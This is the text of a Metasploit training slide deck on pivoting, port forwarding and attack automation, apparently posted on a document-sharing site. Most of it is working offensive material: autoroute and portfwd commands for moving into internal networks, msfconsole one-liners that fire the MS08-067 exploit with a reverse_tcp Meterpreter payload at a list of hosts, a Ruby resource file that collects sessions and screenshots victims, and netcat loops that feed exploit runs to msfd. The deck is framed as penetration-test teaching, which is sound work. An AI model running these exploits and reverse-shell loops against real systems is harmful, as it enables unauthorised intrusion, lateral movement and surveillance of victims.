1. No category

Metasploit Framework (MSF) Fundamentals

Metasploit Framework (MSF)
Fundamentals
Part 3 of 3: Pivoting and Automation
Module Type: Basic Method
Module Number: 0x04
Last Updated: 2017-03-07
Author: Hermit
Topics
• Common Terminology
• Quick Review
• Pivoting
• Port Forwarding
• Automation
Common Terminology
• Vulnerability
• A method of interaction which allows for an unintended action to occur in response
to an unexpected, invalid, or otherwise unaccounted for input of some form.
• Exploit (‘sploit)
• A piece of code that is designed to exploit a vulnerability to allow for an unintended
action.
• Types
• There are three key module types in Metasploit: exploit modules, post-exploit
modules, and auxiliary modules. Exploit modules take advantage of vulnerabities to
gain an initial foothold on the system. Post-exploit modules collect information,
escalate privileges, or otherwise expand upon the foothold achieved through an
exploit module. Auxiliary modules perform functions unrelated to exploitation.
Common Terminology (continued)
• Meterpreter
• A Swiss army knife payload that allows for modular enhancement, routing,
secondary exploitation, and control. A solid first-choice.
• Session
• An open connection to a remote system through which commands, modules,
or network traffic may be directed or routed.
• Pivoting
• Using one system to bridge between two networks, typically to move into a
more privileged or restricted area.
Quick Review
• Selecting vulnerabilities
• Selecting payloads
• Loading post-exploitation modules
Pivoting
1. Compromise a target system via the exploit of your choice and a
Meterpreter payload
2. In the Meterpreter shell, determine what networks are available:
meterpreter > ipconfig /all
Ethernet adapter Local Area
Physical Address.
IP Address. . . .
Subnet Mask . . .
Ethernet adapter Local Area
Physical Address.
IP Address. . . .
Subnet Mask . . .
Connection:
. . . . . . .
. . . . . . .
. . . . . . .
Connection 2:
. . . . . . .
. . . . . . .
. . . . . . .
. : 00-00-00-01-00-00
. : 192.168.1.35
. : 255.255.255.0
. : 00-00-00-99-99-99
. : 10.10.10.35
. : 255.255.255.0
Pivoting (continued)
3. In the Meterpreter shell, run autoroute to establish a route to the
new network:
meterpreter > run autoroute -s 10.10.10.0/24
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.1.35
[*] Use the -p option to list all active routes
4. Verify the route has been added:
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet
Netmask
-----------10.10.10.0
255.255.255.0
5. Background the session
meterpreter > background
Gateway
------Session 1
Pivoting (continued)
6. Now just run commands like you normally would, but targeting the
new network, and it will automatically route through this
connection.
Port Forwarding
• Let’s say there is a target service on a second level network (one that
you can only reach in Metasploit by using routing through a
Meterpreter session) that you want to exploit, but the tool to do so
isn’t available in Metasploit and you don’t have the time, effort, or
expertise to do so.
• Metasploit provides an easy way to handle this through port
forwarding… in essence the remote port gets mapped to a local port
accessible by your operating system, and any tool can then use this to
directly connect.
Port Forwarding (cont.)
• To begin, compromise a remote target and establish routing to make
Metasploit aware of the path. We’ll assume that our machine is
10.20.30.200 and the remove target is 192.168.33.44 (from a dualhomed system at 10.20.30.123 and 192.168.33.50 which has been
compromised with Meterpreter running, not that this makes a lot of
difference).
run autoroute -s 192.168.33.0/24
• Next, use the portfwd command to add the forwarding port (-l is the
local port to use, -p is the remote port, and -r is the remote system):
portfwd add -l 4480 -p 80 -r 192.168.33.44
Port Forwarding (cont.)
• Now port 4480 on your local machine is acting as a forward to port 80
on 192.168.33.44. For instance, you could directly connect to that
remote system on port 80 using netcat in a regular (non-Metasploit)
shell:
netcast localhost 4480
Automation
• All of the work you’ve gone through to this point has prepared you for
what comes next… automating these attacks.
• Let’s assume that you have one exploit that you want to try on every
host you get back from a scan (perhaps you’re targeting a corporate
environment in a penetration test and they use a common build).
• You now know how to do this via the MSF Console, but it’s much
more efficient to let this stuff run automatically in the background.
Automation
• For the sake of this demonstration, we’ll assume that you want to use
the MS08-067 exploit we’ve used for the examples so far. To review,
in the MSF Console you would issue the following commands
(responses excluded for brevity):
msf
msf
msf
msf
msf
msf
> use exploit/windows/smb/ms08_067_netapi
exploit(ms08_067_netapi) > set RHOST 10.20.30.100
exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
exploit(ms08_067_netapi) > set LHOST 10.20.30.200
exploit(ms08_067_netapi) > set LPORT 54321
exploit(ms08_067_netapi) > exploit
Automation
• If we run that on multiple hosts, we really only need to update the
target host each time… a perfect candidate for automation!
• We will use the “-x” option to pass a series of commands to the MSF
Console on startup (note that the following is all one line, run from a
root shell in a terminal session):
root@kali:~# msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set payload
windows/meterpreter/reverse_tcp; set LHOST 10.20.30.200; set LPORT 54321; set RHOST
10.20.30.100; exploit; set RHOST 10.20.30.101; exploit; set RHOST 10.20.30.102;
exploit; exit”
• Each command will be run as if you typed it into the MSF console
manually.
Automation
• Of course, in this case you’d have to manually work each session
yourself. What if you wanted to automatically take an action each
time and close the session instead? Or what if you just want to
collect backgrounded sessions for future efforts?
• This is where a custom resource file comes into play!
Automation
• Custom resource files can be simple text files with commands (such
as the command line pass we just did), but they can also be Ruby
code.
• We’ll use a variation of the demonstraton code the HD Moore
released when Metasploit added Ruby support to demonstrate each
of these use cases.
Automation (Ruby Resource)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 31337
set LHOST 10.20.30.200
set ExitOnSession false
<ruby>
sleep(1)
print_status("Waiting on an incoming sessions...")
while (true)
framework.sessions.each_pair do |sid,s|
thost = s.session_host
# Ensure that stdapi has been loaded before running
if s.ext.aliases['stdapi']
print_status("Screenshotting session #{sid} #{thost}...")
s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
print_status("Closing session #{sid} #{thost}...")
s.kill
else
print_status("Session #{sid} #{thost} active, but not yet configured")
end
end
sleep(1)
end print_status("All done")
</ruby>
Automation
• So what does that code do?
• It loads a generic handler for exploits (something that all
Meterpreters can connect to)
• It prints out the status of incoming connections
• It ensures that the STDAPI module is loaded
• It captures a screenshot from the system
• It closes the session
Automation
• To load it we just run the MSF Console with the option to process a
particular resource file (this file, which we’ll call “autoscreen.rc”):
root@kali:~# msfconsole -r ~/autoscreen.rc
• Now when the MSF Console loads this will automatically begin and
process sessions.
Automation
• … but how do we automate this?
• First, fire up msfd to get a persistent Metasploit instance (the -q
suppresses the banner, and the -p specifies the port):
root@kali:~# msfd -q -p 31337
[*] Initializing msfd…
[*] Running msfd…
• Now, remove the lines for the payload from the previous resource file
and let’s source that in the msfd session. This window will be our
status monitor:
root@kali:~# echo “resource /path/to/resource.file” | netcat localhost 31337
[*] Processing /path/to/resource.file for ERB directives
[*] resource (/path/to/resource.file)> Ruby Code (576 bytes)
[*] Waiting on incoming sessions...
Automation
• Now in another window we can loop through (in whatever manner
we’d like) our targets by piping command sequences into netcat,
using the -n and -e switches, e.g.:
root@kali:~# echo -n -e “use exploit/windows/smb/ms08_067_netapi\nset payload
windows/meterpreter/reverse_tcp\nset LHOST 10.20.30.200\nset LPORT 54321\nset RHOST
$IPADDRESS\nexploit\nexit”
• Voila! Quick looping and processing of targets!
Questions?
Additional Resources
• Metasploit Unleased:
• https://www.offensive-security.com/metasploit-unleashed/
• Sample Metasploit Ruby Resource File:
• https://github.com/rapid7/metasploit-framework/blob/master/msfd
• Metasploit: The Penetration Tester’s Guide
• https://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X
• Metasploit Social Media
• https://twitter.com/metasploit (Official account)
• https://twitter.com/egyp7 (James Lee, lead exploit developer/coder for MSF)
• https://twitter.com/jduck (Josh Drake, former exploit developer for MSF)
• Hermit
• https://twitter.com/hermit_hacker
• https://www.cryptolingus.net/
• https://www.stackattack.net/blog/

 Download  Report

Paperzz.com

Your Paperzz

© Copyright 2026 Paperzz